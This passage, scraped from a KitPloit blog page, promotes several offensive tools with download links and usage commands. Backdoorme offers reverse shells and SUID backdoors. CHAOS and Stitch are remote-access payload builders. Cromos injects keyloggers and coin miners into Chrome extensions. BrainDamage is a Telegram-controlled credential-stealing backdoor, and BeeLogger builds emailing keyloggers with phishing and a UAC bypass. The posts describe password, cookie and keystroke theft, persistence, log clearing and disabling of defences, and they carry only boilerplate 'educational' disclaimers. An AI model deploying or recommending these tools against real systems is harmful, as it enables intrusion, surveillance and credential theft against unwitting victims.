<li><strong>shell</strong> - the shell backdoor is a <a href="http://www.kitploit.com/search/label/Privilege%20Escalation">privilege escalation</a> backdoor, similar to (but more specific than) it's SetUID escalation brother. It duplicates the bash shell to a hidden binary, and sets the SUID bit. Note that root access is initially required to deploy this escalation backdoor. To use, while SSHed in as an unprivileged user, simply run ".bash -p", and you will have root access.</li>
</ul>
</li>
<li>Shell<ul>
<li><strong>bash</strong> - uses a simple bash script to connect to a specific ip and port combination and pipe the output into bash.</li>
<li><strong>bash2</strong> - a slightly different (and more reliable) version of the above bash backdoor which does not prompt for the password on the client-side.</li>
<li><strong>sh</strong> - Similar to the first bash backdoor, but redirects input to /bin/sh.</li>
<li><strong>sh2</strong> - Similar to the second bash backdoor, but redirects input to /bin/sh.</li>
<li><strong>metasploit</strong> - employs msfvenom to create a reverse_tcp binary on the target, then runs the binary to connect to a <a href="http://www.kitploit.com/search/label/Meterpreter">meterpreter</a> shell.</li>
<li><strong>java</strong> - creates a socket connection using libraries from Java and compiles the backdoor on the target.</li>
<li><strong>ruby</strong> - uses ruby's libraries to create a connection, then redirects to /bin/bash.</li>
<li><strong>netcat</strong> - uses netcat to pipe standard input and output to /bin/sh, giving the user an interactive shell.</li>
<li><strong>netcat_traditional</strong> - utilizes netcat-traditional's -e option to create a reverse shell.</li>
<li><strong>perl</strong> - a script written in perl which redirects output to bash, and renames the process to look less conspicuous.</li>
<li><strong>php</strong> - runs a php backdoor which sends output to bash. It does not automatically install a web server, but instead uses the web module</li>
<li><strong>python</strong> - uses a short python script to perform commands and send output back to the user.</li>
<li><strong>web</strong> - ships a web server to the target, then uploads msfvenom's php reverse_tcp backdoor and connects to the host. Although this is also a php backdoor, it is not the same backdoor as the above php backdoor.</li>
</ul>
</li>
<li>Access<ul>
<li><strong>remove_ssh</strong> - removes the <a href="http://www.kitploit.com/search/label/SSH%20server">ssh server</a> on the client. Often good to use at the end of a <a href="http://www.kitploit.com/search/label/BackdoorMe">backdoorme</a> session to remove all traces.</li>
<li><strong>ssh_key</strong> - creates RSA key and copies to target for a passwordless ssh connection.</li>
<li><strong>ssh_port</strong> - Adds a new port for ssh.</li>
</ul>
</li>
<li>Windows<ul>
<li><strong>windows</strong> - Uses msfvenom to create a windows backdoor.</li>
</ul>
</li>
</ul>
<br />
<b>Modules</b><br />
Every backdoor has the ability to have additional modules applied to it to make the backdoor more potent. To add a module, simply use the "add" keyword.<br />
<pre><code>(msf) >> add poison
+ Poison module added</code></pre>
Each module has additional parameters that can be customized, and if "help" is rerun, you can see or set any additional options.<br />
<pre><code>(msf) >> help
...
Poison module options:
Option Value Description Required
------ ----- ----------- --------
name ls name of command to poison False
location /bin where to put poisoned files into False</code></pre>
Currently enabled modules include:<br />
<ul>
<li>Poison</li>
<li>Performs bin poisoning on the target computer - it compiles an executable to call a system utility and an existing backdoor.</li>
<li>For example, if the bin poisoning module is triggered with "ls", it would would compile and move a binary called "ls" that would run both an existing backdoor and the original "ls", thereby tripping a user to run an existing backdoor more frequently.</li>
<li>Cron</li>
</ul>
<ul>
<li>Adds an existing backdoor to the root user's crontab to run with a given frequency.</li>
</ul>
<ul>
<li>Web</li>
<li>Sets up a web server and places a web page which triggers the backdoor.</li>
<li>Simply visit the site with your listener open and the backdoor will begin.</li>
<li>User</li>
<li>Adds a new user to the target.</li>
<li>Startup</li>
<li>Allows for backdoors to be spawned with the bashrc and init files.</li>
<li>Whitelist</li>
<li>Whitelists an IP so that only that IP can connect to the backdoor.</li>
</ul>
<br />
<b>Targets</b><br />
Backdoorme supports multiple different targets concurrently, organized by number when entered. The core maintains one "current" target, to which any new backdoors will default. To switch targets manually, simply add the target number after the command: "use metasploit 2" will prepare the metasploit backdoor against the second target. Run "list" to see the list of current targets, whether a connection is open or closed, and what backdoors & modules are available.<br />
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a href="https://github.com/Kkevsterrr/backdoorme" rel="nofollow" target="_blank">Download Backdoorme</a></span></b></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-63627941293458377402018-04-02T10:35:00.000-03:002018-04-02T10:35:06.420-03:00CHAOS Framework v2.0 - Generate Payloads And Control Remote Windows Systems<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-uiOtRO_8NTU/WsA5T12xkaI/AAAAAAAAKt8/9NKsoODPo0kb9ML6ySmSmFIV9M9RcbTpgCLcBGAs/s1600/CHAOS_7_screenshot.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="432" data-original-width="712" src="https://1.bp.blogspot.com/-uiOtRO_8NTU/WsA5T12xkaI/AAAAAAAAKt8/9NKsoODPo0kb9ML6ySmSmFIV9M9RcbTpgCLcBGAs/s1600/CHAOS_7_screenshot.gif" /></a></div>
<br />
CHAOS allow generate payloads and control <a href="http://www.kitploit.com/search/label/Remote">remote</a> <a href="http://www.kitploit.com/search/label/Windows">Windows</a> systems.</div>
<a name='more'></a><br />
<span style="font-size: x-large;"><b>Disclaimer</b></span><br />
<div style="text-align: center;">
<div style="text-align: left;">
This project was created only for learning purpose.</div>
</div>
THIS SOFTWARE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. YOU MAY USE THIS SOFTWARE AT YOUR OWN RISK. THE USE IS COMPLETE RESPONSIBILITY OF THE END-USER. THE DEVELOPERS ASSUME NO LIABILITY AND ARE NOT RESPONSIBLE FOR ANY MISUSE OR DAMAGE CAUSED BY THIS PROGRAM.<br />
<br />
<span style="font-size: x-large;"><b>Features</b></span><br />
<ul class="contains-task-list">
<li class="task-list-item">Reverse Shell</li>
<li class="task-list-item">Download File</li>
<li class="task-list-item">Upload File</li>
<li class="task-list-item">Screenshot</li>
<li class="task-list-item"><a href="http://www.kitploit.com/search/label/Keylogger">Keylogger</a></li>
<li class="task-list-item">Persistence</li>
<li class="task-list-item">Open URL Remotely</li>
<li class="task-list-item">Get Operating System Name</li>
<li class="task-list-item">Run Fork Bomb</li>
</ul>
<br />
<span style="font-size: x-large;"><b>Tested On</b></span><br />
<a href="https://www.kali.org/" rel="nofollow" target="_blank"><img alt="Kali)" data-canonical-src="https://www.google.com/s2/favicons?domain=https://www.kali.org/" src="https://camo.githubusercontent.com/d62dc6cb55793563d3715b6f465d3cf032199c8a/68747470733a2f2f7777772e676f6f676c652e636f6d2f73322f66617669636f6e733f646f6d61696e3d68747470733a2f2f7777772e6b616c692e6f72672f" style="max-width: 100%;" /></a> <strong>Kali Linux - ROLLING EDITION</strong><br />
<br />
<span style="font-size: x-large;"><b>How To Use</b></span><br />
<div>
<pre><code># Install dependencies (You need Golang and UPX package installed)
$ apt install golang xterm git upx-ucl -y
# Clone this repository
$ git clone https://github.com/tiagorlampert/CHAOS.git
# Get and install external imports (requirement to screenshot)
$ go get github.com/kbinani/screenshot && go get github.com/lxn/win
$ go install github.com/kbinani/screenshot && go install github.com/lxn/win
# Maybe you will see the message "package github.com/lxn/win: build constraints exclude all Go files".
# It's occurs because the libraries are to windows systems, but it necessary to build the payload.
# Go into the repository
$ cd CHAOS
# Run
$ go run CHAOS.go</code></pre>
</div>
<br />
<span style="font-size: x-large;"><b>Video</b></span><br />
<div align="center">
<br /></div>
<div align="center">
<iframe allow="autoplay; encrypted-media" allowfullscreen="" frameborder="0" height="360" src="https://www.youtube.com/embed/9P-3qSA_ZjQ" width="640"></iframe></div>
<br />
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a href="https://github.com/tiagorlampert/CHAOS" rel="nofollow" target="_blank">Download CHAOS</a></span></b></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-50684893072593951012017-11-08T10:21:00.000-03:002017-11-08T10:21:06.471-03:00Cromos - Download and Inject code into Google Chrome extensions<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-kepgNdYPTvo/WgKPuGRRKyI/AAAAAAAAJWw/0WTCHbicPCQ7BqhGkza3hR_8_SpwlWeqgCLcBGAs/s1600/cromos.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="484" data-original-width="620" src="https://2.bp.blogspot.com/-kepgNdYPTvo/WgKPuGRRKyI/AAAAAAAAJWw/0WTCHbicPCQ7BqhGkza3hR_8_SpwlWeqgCLcBGAs/s1600/cromos.png" /></a></div>
<br />
<div style="text-align: justify;">
Cromos is a tool for downloading legitimate extensions of the Chrome Web Store and inject codes in the background of the application and more cromos create executable files to force installation via <strong>PowerShell</strong> for example, and also upload files to <a href="http://www.kitploit.com/search/label/Dropbox">dropbox</a> to host the malicious files.</div>
<ul>
<li style="text-align: justify;">Download extension</li>
<li style="text-align: justify;">Injections</li>
<li style="text-align: justify;">Upload files on dropbox</li>
<li style="text-align: justify;">Windows infection</li>
</ul>
<div style="text-align: justify;">
</div>
<a name='more'></a><br />
<div style="text-align: justify;">
<b>Group Policy Object (GPO)</b></div>
<div style="text-align: justify;">
Chrome allows you to add extensions using Windows Group Policy Object (GPO) if you need to force installation on multiple machines just follow the steps in the <a href="https://docs.google.com/document/d/1iu6I0MhyrvyS5h5re5ai8RSVO2sYx2gWI4Zk4Tp6fgc" rel="nofollow" target="_blank"> Chrome Deployment Guide </a> then modify the original extension with few modifications you can publish your extension in the Chrome Web Store requires to pay $5.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b>Support</b></div>
<div style="text-align: justify;">
If you chose to generate a batch file to force installation the script in <a href="http://www.kitploit.com/search/label/PowerShell">powershell</a> that will be downloaded is compatible Windows, 7, 8 10 with versions of powershell >= 3.0</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b>Demo</b></div>
<div style="text-align: justify;">
This is a demonstration of the tool at work in this examples I'm downloading a famous Google extension called G Suite Training on Google Chrome Web Store and injecting a <a href="http://www.kitploit.com/search/label/Keylogger">keylogger</a> module.</div>
<div style="text-align: center;">
<script async="" id="asciicast-ENrke3a5kU83jC3hXIDdgWWyd" src="https://asciinema.org/a/ENrke3a5kU83jC3hXIDdgWWyd.js" type="text/javascript"></script></div>
<br />
<b><span style="font-size: large;">Installation</span></b><br />
<pre><code>$ cd $HOME/
$ git clone https://github.com/fbctf/cromos
$ sudo chmod -R 777 cromos/
$ cd cromos && python setup.py</code></pre>
<br />
<b><span style="font-size: large;">Usage</span></b><br />
<br />
<b>Downloading the extension</b><br />
<pre><code>Usage: python cromos.py --extension {id}</code></pre>
<br />
<b>Downloading the extension and loading module</b><br />
<pre><code>Usage: python cromos.py --extension {id} --load {currency/keylogger}</code></pre>
<br />
<b>Build a batch file and upload the files in dropbox</b><br />
<pre><code>Usage: python cromos.py --extension {id} --build {bat} --token {dropboxToken}</code></pre>
<br />
<b>Modules</b><br />
You can also inject some predefined modules in the background as <strong>keylogger</strong>, <strong>virtual currency</strong>.<br />
<table> <thead>
<tr> <th>Module</th> <th>Description</th> </tr>
</thead> <tbody>
<tr> <td>modules/keylogger</td> <td>This module captures all the <a href="http://www.kitploit.com/search/label/Passwords">passwords</a> you type in an infected browser over https or not. All you need is to have a php server for example to receive the requests get the parameters are email, password, <a href="http://www.kitploit.com/search/label/Cookies">cookies</a> and userAgent.</td> </tr>
<tr> <td>modules/currency</td> <td>This module allows you to mine virtual coins using the coinhive API, you just need to have an account.</td> </tr>
</tbody></table>
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a href="https://github.com/fbctf/cromos" rel="nofollow" target="_blank">Download Cromos</a></span></b></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-15236386409483020032017-03-15T11:30:00.000-03:002017-03-15T11:30:33.392-03:00BrainDamage - A fully featured backdoor that uses Telegram as a C&C server<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-12VckHz9YI0/WL35eBXU_bI/AAAAAAAAHYw/m3EG4B-Q81gRjn8b600JPewj9iTxdkplACLcB/s1600/BrainDamage_01.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="514" src="https://3.bp.blogspot.com/-12VckHz9YI0/WL35eBXU_bI/AAAAAAAAHYw/m3EG4B-Q81gRjn8b600JPewj9iTxdkplACLcB/s640/BrainDamage_01.jpg" width="640" /></a></div>
<br />
A python based backdoor which uses <a href="https://telegram.org/" target="_blank"> Telegram </a> as C&C server.<br />
<a name='more'></a><br />
<pre><code> /\
/_.\
_,.-'/ `",\'-.,_
-~^ /______\`~~-^~:
____ _ _____
| _ \ (_) | __ \
| |_) |_ __ __ _ _ _ __ | | | | __ _ _ __ ___ __ _ __ _ ___
| _ <| '__/ _` | | '_ \| | | |/ _` | '_ ` _ \ / _` |/ _` |/ _ \
| |_) | | | (_| | | | | | |__| | (_| | | | | | | (_| | (_| | __/
|____/|_| \__,_|_|_| |_|_____/ \__,_|_| |_| |_|\__,_|\__, |\___|
__/ |
|___/
--> Coded by: Mehul Jain(mehulj94@gmail.com)
--> Github: https://github.com/mehulj94
--> Twitter: https://twitter.com/wayfarermj
--> For windows only
______ _
| ____| | |
| |__ ___ __ _| |_ _ _ _ __ ___ ___
| __/ _ \/ _` | __| | | | '__/ _ \/ __|
| | | __/ (_| | |_| |_| | | | __/\__ \
|_| \___|\__,_|\__|\__,_|_| \___||___/
--> Persistance
--> USB spreading
--> Port Scanner
--> Router Finder
--> Run shell commands
--> Keylogger
--> Insert keystrokes
--> Record audio
--> Webserver
--> Screenshot logging
--> Download files in the host
--> Execute shutdown, restart, logoff, lock
--> Send drive tree structure
--> Set email template
--> Rename Files
--> Change wallpaper
--> Open website
--> Send Password for
• Chrome
• Mozilla
• Filezilla
• Core FTP
• CyberDuck
• FTPNavigator
• WinSCP
• Outlook
• Putty
• Skype
• Generic Network
--> Cookie stealer
--> Send active windows
--> Gather system information
• Drives list
• Internal and External IP
• Ipconfig /all output
• Platform</code></pre>
<br />
<span style="font-size: large;"> <b> Setup </b> </span> <br />
<ul>
<li> Telegram setup: <ul>
<li> Install <a href="https://telegram.org/" target="_blank"> Telegram </a> app and search for "BOTFATHER". </li>
<li> Type /help to see all possible commands. </li>
<li> Click on or type /newbot to create a new bot. </li>
<li> Name your bot. </li>
<li> You should see a new API token generated for it. </li>
</ul>
</li>
<li> Dedicated Gmail account. Remember to check "allow connection from less secure apps" in gmail settings. </li>
<li> Set access_token in eclipse.py to token given by the botfather. </li>
<li> Set CHAT_ID in eclipse.py. Send a message from the app and use the telegram api to get this chat id. </li>
</ul>
<blockquote>
bot.getMe() will give output {'first_name': 'Your Bot', 'username': 'YourBot', 'id': 123456789} </blockquote>
<ul>
<li> Set copied_startup_filename in Eclipse.py. </li>
<li> Set Gmail password and Username in /Breathe/SendData.py </li>
</ul>
<br />
<span style="font-size: large;"> <b> Abilities </b> </span> <br />
<ul>
<li> whoisonline- list active slaves <br />
<blockquote>
This command will list all the active slaves. </blockquote>
</li>
<li> destroy- delete&clean up <br />
<blockquote>
This command will remove the stub from host and will remove registry entries. </blockquote>
</li>
<li> cmd- execute command on CMD <br />
<blockquote>
Run shell commands on host </blockquote>
</li>
<li> download- url (startup, desktop, default) <br />
<blockquote>
This will download files in the host computer. </blockquote>
</li>
<li> execute- shutdown, restart, logoff, lock <br />
<blockquote>
Execute the following commands </blockquote>
</li>
<li> screenshot- take screenshot <br />
<blockquote>
Take screenshot of the host of computer. </blockquote>
</li>
<li> send- passwords, drivetree, driveslist, keystrokes, openwindows <br />
<blockquote>
This command will sends passwords (saved browser passwords, FTP, Putty..), directory tree of host (upto level 2), logged keystrokes and windows which are currently open </blockquote>
</li>
<li> set- email (0:Default,1:URL,2:Update), filename (0: Itself, 1: Others), keystrokes (text) <br />
<blockquote>
This command can set email template (default, download from url, update current template with text you'll send), rename filenames or insert keystrokes in host. </blockquote>
</li>
<li> start- website (URL), keylogger, recaudio (time), webserver (Port), spread <br />
<blockquote>
This command can open website, start keylogger, record audio, start webserver, USB Spreading </blockquote>
</li>
<li> stop- keylogger, webserver <br />
<blockquote>
This command will stop keylogger or webserver </blockquote>
</li>
<li> wallpaper- change wallpaper (URL) <br />
<blockquote>
Changes wallpaper of host computer </blockquote>
</li>
<li> find- openports (host, threads, ports), router <br />
<blockquote>
This command will find open ports and the router the host is using </blockquote>
</li>
<li> help- print this usage <br />
</li>
</ul>
<br />
<span style="font-size: large;"> <b> Requirements </b> </span> <br />
<ul>
<li> <a href="https://github.com/nickoala/telepot" target="_blank"> Telepot </a> </li>
<li> <a href="https://people.csail.mit.edu/hubert/pyaudio/" target="_blank"> PyAudio </a> </li>
<li> <a href="http://www.voidspace.org.uk/python/modules.shtml#pycrypto" target="_blank"> PyCyrpto </a> </li>
<li> <a href="https://pypi.python.org/pypi/pyasn1" target="_blank"> Pyasn1 </a> </li>
<li> <a href="https://pillow.readthedocs.io/en/latest/installation.html" target="_blank"> Pillow </a> </li>
<li> Install <a href="https://sourceforge.net/projects/pyhook/" target="_blank"> PyHook </a> </li>
<li> Install <a href="https://sourceforge.net/projects/pywin32/" target="_blank"> PyWin32 </a> </li>
<li> Install <a href="https://www.microsoft.com/en-us/download/details.aspx?id=44266" target="_blank"> Microsoft Visual C++ Compiler for Python </a> </li>
<li> Install <a href="http://www.pyinstaller.org/" target="_blank"> PyInstaller </a> </li>
</ul>
<br />
<span style="font-size: large;"> <b> Screenshots </b> </span> <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-zz2EsMT1CGA/WL35t6cNX3I/AAAAAAAAHY0/xfrh0qKQOTY6RyAILIhs-zfBTtCrilamwCLcB/s1600/BrainDamage_02.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="187" src="https://3.bp.blogspot.com/-zz2EsMT1CGA/WL35t6cNX3I/AAAAAAAAHY0/xfrh0qKQOTY6RyAILIhs-zfBTtCrilamwCLcB/s640/BrainDamage_02.jpg" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-xtd2jgP65wo/WL35ucG-a6I/AAAAAAAAHY8/sxvojqo1kVsHj3fBMKndWNIQsqucdEi4gCLcB/s1600/BrainDamage_03.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://4.bp.blogspot.com/-xtd2jgP65wo/WL35ucG-a6I/AAAAAAAAHY8/sxvojqo1kVsHj3fBMKndWNIQsqucdEi4gCLcB/s640/BrainDamage_03.jpg" width="462" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-vyQY6NenMOU/WL35uLKHJPI/AAAAAAAAHY4/p2B46F4MTIMOzer-WBXfHZkuZ3TSuWdCwCLcB/s1600/BrainDamage_04.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="186" src="https://4.bp.blogspot.com/-vyQY6NenMOU/WL35uLKHJPI/AAAAAAAAHY4/p2B46F4MTIMOzer-WBXfHZkuZ3TSuWdCwCLcB/s640/BrainDamage_04.jpg" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-jHGfbYrBHSw/WL35ub0esFI/AAAAAAAAHZA/TxnrherTI6gNdBM7SVXpEtiWKTOag9QSQCLcB/s1600/BrainDamage_05.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="580" src="https://3.bp.blogspot.com/-jHGfbYrBHSw/WL35ub0esFI/AAAAAAAAHZA/TxnrherTI6gNdBM7SVXpEtiWKTOag9QSQCLcB/s640/BrainDamage_05.jpg" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-0ikk1krT0go/WL35uuBT9dI/AAAAAAAAHZE/G1_5tZ3DU_EPCPeVbdcB9FUg_YEkGJ4hQCLcB/s1600/BrainDamage_06.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="452" src="https://4.bp.blogspot.com/-0ikk1krT0go/WL35uuBT9dI/AAAAAAAAHZE/G1_5tZ3DU_EPCPeVbdcB9FUg_YEkGJ4hQCLcB/s640/BrainDamage_06.png" width="640" /></a></div>
<br />
For educational purposes only, use at your own responsibility. <br />
<br />
<br />
<div style="text-align: center;">
<b> <span style="font-size: x-large;"> <a href="https://github.com/mehulj94/BrainDamage" target="_blank"> Download BrainDamage </a> </span> </b> </div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-73570775283194685272017-03-06T11:29:00.000-03:002017-03-06T11:29:07.774-03:00Stitch - Python Remote Administration Tool (RAT)<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-4OxHntgJi68/WLJ1jMhCLSI/AAAAAAAAHV0/jVt4UbMc82AtYVdkDAwSLGZVcIpBDxJ6gCLcB/s1600/Stitch.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="436" src="https://4.bp.blogspot.com/-4OxHntgJi68/WLJ1jMhCLSI/AAAAAAAAHV0/jVt4UbMc82AtYVdkDAwSLGZVcIpBDxJ6gCLcB/s640/Stitch.png" width="640" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
This is a cross platform python framework which allows you to build custom payloads for Windows, Mac OSX and Linux as well. You are able to select whether the payload binds to a specific IP and port, listens for a connection on a port, option to send an email of system info when the system boots, and option to start keylogger on boot. Payloads created can only run on the OS that they were created on.</div>
<a name='more'></a><br />
<span style="font-size: large;"> <b> Features </b> </span> <br />
<br />
<b> Cross Platform Support </b> <br />
<ul>
<li> Command and file auto-completion </li>
<li> Antivirus detection </li>
<li> Able to turn off/on display monitors </li>
<li> Hide/unhide files and directories </li>
<li> View/edit the hosts file </li>
<li> View all the systems environment variables </li>
<li> Keylogger with options to view status, start, stop and dump the logs onto your host system </li>
<li> View the location and other information of the target machine </li>
<li> Execute custom python scripts which return whatever you print to screen </li>
<li> Screenshots </li>
<li> Virtual machine detection </li>
<li> Download/Upload files to and from the target system </li>
<li> Attempt to dump the systems password hashes </li>
<li> Payloads' properties are "disguised" as other known programs </li>
</ul>
<br />
<b> Windows Specific </b> <br />
<ul>
<li> Display a user/password dialog box to obtain user password </li>
<li> Dump passwords saved via Chrome </li>
<li> Clear the System, Security, and Application logs </li>
<li> Enable/Disable services such as RDP,UAC, and Windows Defender </li>
<li> Edit the accessed, created, and modified properties of files </li>
<li> Create a custom popup box </li>
<li> View connected webcam and take snapshots </li>
<li> View past connected wifi connections along with their passwords </li>
<li> View information about drives connected </li>
<li> View summary of registry values such as DEP </li>
</ul>
<br />
<b> Mac OSX Specific </b> <br />
<ul>
<li> Display a user/password dialog box to obtain user password </li>
<li> Change the login text at the user's login screen </li>
<li> Webcam snapshots </li>
</ul>
<br />
<b> Mac OSX/Linux Specific </b> <br />
<ul>
<li> SSH from the target machine into another host </li>
<li> Run sudo commands </li>
<li> Attempt to bruteforce the user's password using the passwords list found in Tools/ </li>
<li> Webcam snapshots? (untested on Linux) </li>
</ul>
<br />
<span style="font-size: large;"> <b> Implemented Transports </b> </span> <br />
All communication between the host and target is AES encrypted. Every Stitch program generates an AES key which is then put into all payloads. To access a payload the AES keys must match. To connect from a different system running Stitch you must add the key by using the showkey command from the original system and the addkey command on the new system. <br />
<br />
<span style="font-size: large;"> <b> Implemented Payload Installers </b> </span> <br />
The "stitchgen" command gives the user the option to create <a href="http://nsis.sourceforge.net/Main_Page" target="_blank"> NSIS </a> installers on Windows and <a href="http://stephanepeter.com/makeself/" target="_blank"> Makeself </a> installers on posix machines. For Windows, the installer packages the payload and an elevation exe ,which prevents the firewall prompt and adds persistence, and places the payload on the system. For Mac OSX and Linux, the installer places the payload and attempts to add persistence. To create NSIS installers you must <a href="http://nsis.sourceforge.net/Download" target="_blank"> download </a> and install NSIS. <br />
<br />
<span style="font-size: large;"> <b> Wiki </b> </span> <br />
<ul>
<li> <a href="https://github.com/nathanlopez/Stitch/wiki/Crash-Course" target="_blank"> Crash Course of Stitch </a> </li>
</ul>
<br />
<span style="font-size: large;"> <b> Requirements </b> </span> <br />
<ul>
<li> <a href="https://www.python.org/downloads/" target="_blank"> Python 2.7 </a> </li>
</ul>
For easy installation run the following command that corresponds to your OS: <br />
<pre><code># for Windows
pip install -r win_requirements.txt
# for Mac OSX
pip install -r osx_requirements.txt
# for Linux
pip install -r lnx_requirements.txt</code></pre>
<ul>
<li> <a href="https://pypi.python.org/pypi/pycrypto" target="_blank"> Pycrypto </a> </li>
<li> <a href="http://docs.python-requests.org/en/master/" target="_blank"> Requests </a> </li>
<li> <a href="https://pypi.python.org/pypi/colorama" target="_blank"> Colorama </a> </li>
<li> <a href="https://pypi.python.org/pypi/PIL" target="_blank"> PIL </a> </li>
</ul>
<br />
<b> Windows Specific </b> <br />
<ul>
<li> <a href="http://www.py2exe.org/" target="_blank"> Py2exe </a> </li>
<li> <a href="https://sourceforge.net/projects/pywin32/" target="_blank"> pywin32 </a> </li>
</ul>
<br />
<b> Mac OSX Specific </b> <br />
<ul>
<li> <a href="https://pythonhosted.org/pyobjc/" target="_blank"> PyObjC </a> </li>
</ul>
<br />
<b> Mac OSX/Linux Specific </b> <br />
<ul>
<li> <a href="http://www.pyinstaller.org/" target="_blank"> PyInstaller </a> </li>
<li> <a href="https://pexpect.readthedocs.io/en/stable/" target="_blank"> pexpect </a> </li>
</ul>
<br />
<span style="font-size: large;"> <b> To Run </b> </span> <br />
<pre><code>python main.py
or
./main.py</code></pre>
<br />
<span style="font-size: large;"> <b> Motivation </b> </span> <br />
My motivation behind this was to advance my knowledge of python, hacking, and just to see what I could accomplish. Was somewhat discouraged and almost abandoned this project when I found the amazing work done by <a href="https://github.com/n1nj4sec/pupy" target="_blank"> n1nj4sec </a> , but still decided to put this up since I had already come so far. <br />
<br />
<span style="font-size: large;"> <b> Other open-source Python RATs for Reference </b> </span> <br />
<ul>
<li> <a href="https://github.com/vesche/basicRAT" target="_blank"> vesche/basicRAT </a> </li>
<li> <a href="https://github.com/n1nj4sec/pupy" target="_blank"> n1nj4sec/pupy </a> </li>
</ul>
<br />
<span style="font-size: large;"> <b> Screenshots </b> </span> <br />
<a href="https://cloud.githubusercontent.com/assets/13227314/21706517/80d977b4-d37c-11e6-9588-5cd1bb3ecf37.PNG" target="_blank"> </a><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-G-lZ3PiTPVM/WLJ1t3kOHnI/AAAAAAAAHWA/PQEwTPH6rX4G3jpjeCKeKP7J0KWW2rLMwCLcB/s1600/Stitch2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="462" src="https://3.bp.blogspot.com/-G-lZ3PiTPVM/WLJ1t3kOHnI/AAAAAAAAHWA/PQEwTPH6rX4G3jpjeCKeKP7J0KWW2rLMwCLcB/s640/Stitch2.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-CkdzEFwEMK8/WLJ1tgcjgwI/AAAAAAAAHV4/gCIwhZTo_zE-JW0OZ6UrGbsDR-zZuh70QCLcB/s1600/Stitch3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="344" src="https://4.bp.blogspot.com/-CkdzEFwEMK8/WLJ1tgcjgwI/AAAAAAAAHV4/gCIwhZTo_zE-JW0OZ6UrGbsDR-zZuh70QCLcB/s640/Stitch3.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/--m7PYDshG6Y/WLJ1t_UPCFI/AAAAAAAAHV8/A6dA72z5PYU2n_SbXx5UfwQcA4iPeTibACLcB/s1600/Stitch4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="182" src="https://1.bp.blogspot.com/--m7PYDshG6Y/WLJ1t_UPCFI/AAAAAAAAHV8/A6dA72z5PYU2n_SbXx5UfwQcA4iPeTibACLcB/s640/Stitch4.png" width="640" /></a></div>
<br />
<br />
<div style="text-align: center;">
<b> <span style="font-size: x-large;"> <a href="https://github.com/nathanlopez/Stitch" target="_blank"> Download Stitch </a> </span> </b> </div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-25568985929460061402017-02-20T10:48:00.000-03:002017-02-20T10:48:00.181-03:00BeeLogger - Generate Emailing Keyloggers to Windows on Linux<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-GFAfx38LpE4/WKfgN7KI1SI/AAAAAAAAHTQ/XrJPPCTEwSwt9cADnmxPPOhbl3IjtrN6gCLcB/s1600/beelogger.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="408" src="https://2.bp.blogspot.com/-GFAfx38LpE4/WKfgN7KI1SI/AAAAAAAAHTQ/XrJPPCTEwSwt9cADnmxPPOhbl3IjtrN6gCLcB/s640/beelogger.png" width="640" /></a></div>
<br />
Generate gmail emailing keyloggers to windows on linux, powered by python and compiled by pyinstaller.<br />
<br />
<span style="font-size: large;"> <b> Features </b> </span> <br />
<ul>
<li> Send logs each 120 seconds. </li>
<li> Send logs when chars > 50. </li>
<li> Send logs with gmail. </li>
<li> Some Phishing methods are included. </li>
<li> Multiple Session disabled. </li>
<li> Bypass UAC.</li>
</ul>
<a name='more'></a><br />
<b> Prerequisites </b> <br />
<ul>
<li> apt </li>
<li> wine </li>
<li> wget </li>
<li> Linux </li>
<li> sudo </li>
<li> python2.7 </li>
<li> python 2.7 on Wine Machine </li>
<li> pywin32 on Wine Machine </li>
<li> pythoncom on Wine Machine </li>
</ul>
<br />
<b> Tested on: </b> <br />
<ul>
<li> Kali Linux - SANA </li>
